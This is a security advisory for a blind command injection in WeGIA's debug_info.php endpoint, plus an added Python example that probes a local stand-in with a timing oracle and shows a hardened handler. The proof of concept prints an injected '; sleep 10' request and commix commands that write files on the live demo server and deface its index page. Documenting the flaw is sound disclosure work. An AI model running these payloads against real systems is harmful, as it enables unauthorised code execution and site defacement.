
CVE-2025-50201

Command Injection

CVE-2025-50201: OS Command Injection (Blind Time-Based) in debug_info.php parameter branch

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-50201

Summary

An OS Command Injection vulnerability was identified in the /html/configuracao/debug_info.php endpoint. The branch parameter is not validated or escaped before being concatenated into a shell command that is executed on the server's operating system.

This flaw allows an unauthenticated attacker to execute arbitrary commands on the server with the privileges of the web server user (www-data). This completely compromises the Confidentiality, Integrity, and Availability of the application and the underlying server.

Details

The vulnerability can be triggered by sending a POST request to the vulnerable endpoint and injecting shell metacharacters (such as ;) into the branch parameter. The server passes the supplied input to the shell without validation, so anything after the separator runs as a second command. The vulnerability was confirmed to be "Blind": the command's output is not reflected in the HTTP response, so exploitation relies on time-based techniques (injecting a sleep and measuring the response delay).

Initial Vulnerable Request:

POST /html/configuracao/debug_info.php HTTP/1.1
Host: demo.wegia.org
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

branch=master; sleep 10&action=switch

The server's response was delayed by roughly the injected sleep duration, which confirmed the vulnerability.
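The following is an added example, not WeGIA code and not part of the original advisory. It shows the mechanism behind the time-based check above: a local, constructed stand-in for the vulnerable endpoint (the real command behind debug_info.php is not on the page, so `echo` is assumed in its place), a timing oracle that injects `; sleep N` and compares latencies against a benign baseline, and the hardened handling of the same parameter (allowlist plus argv list with no shell). Function and variable names are the example's own.

```python
"""Added example (not WeGIA code): time-based blind command-injection oracle
against a constructed local stand-in, next to the hardened form of the handler."""
import re
import subprocess
import time
from typing import Callable


def vulnerable_endpoint(branch: str) -> None:
    """Constructed stand-in for debug_info.php: the request parameter is
    concatenated into a shell string. `echo` is an assumption; the page does
    not show the real command, only that `branch` is concatenated into one."""
    subprocess.run("echo " + branch, shell=True,
                   stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


# Allowlist for a branch-like value: letters, digits, '.', '_', '/', '-',
# never starting with '-' so the value cannot be parsed as an option.
BRANCH_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,99}$")


def is_valid_branch(value: str) -> bool:
    return BRANCH_RE.fullmatch(value) is not None


def hardened_endpoint(branch: str) -> list:
    """Hardened stand-in: reject anything outside the allowlist, then pass the
    value as its own argv element with no shell, so ';', '|', '$(...)' and
    friends are plain characters. Returns the argv that was run."""
    if not is_valid_branch(branch):
        raise ValueError(f"rejected branch value: {branch!r}")
    argv = ["echo", branch]  # for a real `git checkout`, add "--" before the value
    subprocess.run(argv, check=True, stdout=subprocess.DEVNULL)
    return argv


def measure(send: Callable[[str], object], value: str) -> float:
    """Wall-clock time of one request. A rejected value is still timed: a real
    target answers 4xx quickly, and the timing is what the oracle reads."""
    t0 = time.perf_counter()
    try:
        send(value)
    except ValueError:
        pass
    return time.perf_counter() - t0


def time_based_probe(send: Callable[[str], object], benign: str,
                     delay: float, reps: int = 3) -> bool:
    """Blind time-based check: inject '; sleep <delay>' after the benign value
    and require every injected request to exceed the slowest benign request
    by at least ~delay. Repeating guards against a single slow baseline."""
    baseline = max(measure(send, benign) for _ in range(reps))
    payload = f"{benign}; sleep {delay}"
    injected = [measure(send, payload) for _ in range(reps)]
    return all(t - baseline >= delay * 0.9 for t in injected)


if __name__ == "__main__":
    print("vulnerable stand-in injectable:", time_based_probe(vulnerable_endpoint, "master", 0.3))
    print("hardened stand-in injectable:  ", time_based_probe(hardened_endpoint, "master", 0.3))
```

Against a real target, `send` would be an HTTP POST of `branch=<value>&action=switch`; the oracle logic is the same one commix's `--technique=time` automates, and the hardened handler is the pattern the fix needs: validate against an allowlist and never hand user input to a shell string.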

PoC

To demonstrate a tangible impact on system integrity, the commix tool was used to inject echo commands that write files in web-accessible locations on the server.

1. Attack Commands:

The first command creates the prova_tcc.html file with custom content; the second appends a line to index.php two directories up from the vulnerable script. Both use --technique="time" because the injection is blind:

python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" --data="branch=master&action=switch" -p "branch" --technique="time" --os-cmd='echo "<h1>Server Hacked - Server Access Confirmed</h1>" > prova_tcc.html'

python3 commix.py -u "https://demo.wegia.org/html/configuracao/debug_info.php" --data="branch=master&action=switch" -p "branch" --technique="time" --time-sec=2 --os-cmd='echo "teste" >> ../../index.php'

2. Verification:

After the first command ran, the created file became publicly accessible via the browser at the following URL (the relative path resolved to the vulnerable script's own directory): https://demo.wegia.org/html/configuracao/prova_tcc.html

After the second command ran, the page at https://demo.wegia.org/ was modified, as shown in the image below:

Impact

Successful exploitation of this vulnerability allows an unauthenticated attacker to:

  • Compromise Confidentiality: Read sensitive files from the server, including the application's source code, API keys, and configuration files.
  • Compromise Integrity: Modify or delete any file to which the www-data user has write permissions, allowing for website defacement, malware injection, or application destruction.
  • Compromise Availability: Execute commands that consume system resources (CPU, Memory), leading to a Denial of Service (DoS).
  • Act as a Pivot: Use the compromised server as a base to attack other systems on the internal network.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf

Reporter

Pedro Lyrio

Contributor

Diego Castro

By: CVE-Hunters
